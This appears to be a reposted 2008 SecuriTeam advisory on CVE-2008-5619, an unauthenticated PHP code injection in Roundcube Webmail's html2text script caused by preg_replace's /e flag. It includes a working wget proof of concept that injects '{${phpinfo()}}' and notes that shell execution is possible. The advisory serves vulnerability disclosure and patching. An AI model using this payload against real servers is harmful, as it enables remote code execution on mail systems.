Wednesday, December 24, 2008

[UNIX] Roundcubemail PHP Arbitrary Code Injection

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Roundcubemail PHP Arbitrary Code Injection
------------------------------------------------------------------------


SUMMARY

Roundcube Webmail is a browser-based IMAP client that uses "chuggnutt.com
HTML to Plain Text Conversion" library to convert HTML text to plain text,
this library uses the preg_replace PHP function in an insecure manner. A
vulnerability in Roundcubemail's html2text script allows unauthenticated
remote attackers to execute arbitrary PHP code.

DETAILS

Vulnerable Systems:
* Round Cube RoundCube Webmail 0.2-3 beta
* Round Cube RoundCube Webmail 0.2-1 alpha (tested)

Analysis of the vulnerable code
The script bin/html2text.php creates an instance of the class html2text
with the given POST data, the problem arises in the file
program/lib/html2text.php in function _convert() on line 381:

// Run our defined search-and-replace
$text = preg_replace($this->search, $this->replace, $text);

Some patterns in $this->search allow interpret PHP code using the "e"
flag, i.e.:
'/<a [^>]*href=("|\')([^"\']+)\1[^>]*>(.+?)<\/a>/ie', // <a href="">
'/<b[^>]*>(.+?)<\/b>/ie', // <b>
'/<th[^>]*>(.+?)<\/th>/ie', // <th> and </th>

In concrete those would be replaced by:
'$this->_build_link_list("\\2", "\\3")', // <a href="">
'strtoupper("\\1")', // <b>
"strtoupper(\"\t\t\\1\n\")", // <th> and </th>

Now using PHP complex (curly) syntax we can take advantage of this to
interpret arbitrary PHP code, evaluating PHP code embedded inside strings.

Proof of Concept
As this vulnerability was discovered in-the-wild:
<http://trac.roundcube.net/ticket/1485618>
http://trac.roundcube.net/ticket/1485618 was quite sure that would be
exploitable, using PHP curly we can execute phpinfo():

wget -q --header="Content-Type: ''" \
-O - --post-data='<b>{${phpinfo()}}</b>' \
--no-check-certificate \
http://127.0.0.1/roundcubemail-0.2-alpha/bin/html2text.php

Using PHP curly syntax plus some tricks to bypass PHP magic_quotes_gpc to
avoid using single or double quotes the arbitrary shell command execution
is fully feasible.

Patch:
Apply the patch provided at:
<http://sourceforge.net/forum/forum.php?forum_id=898542>
http://sourceforge.net/forum/forum.php?forum_id=898542

CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5619>
CVE-2008-5619


ADDITIONAL INFORMATION

The information has been provided by <mailto:advisories@sofistic.net>
Jacobo Avariento Gimeno.

========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

No comments:

Post a Comment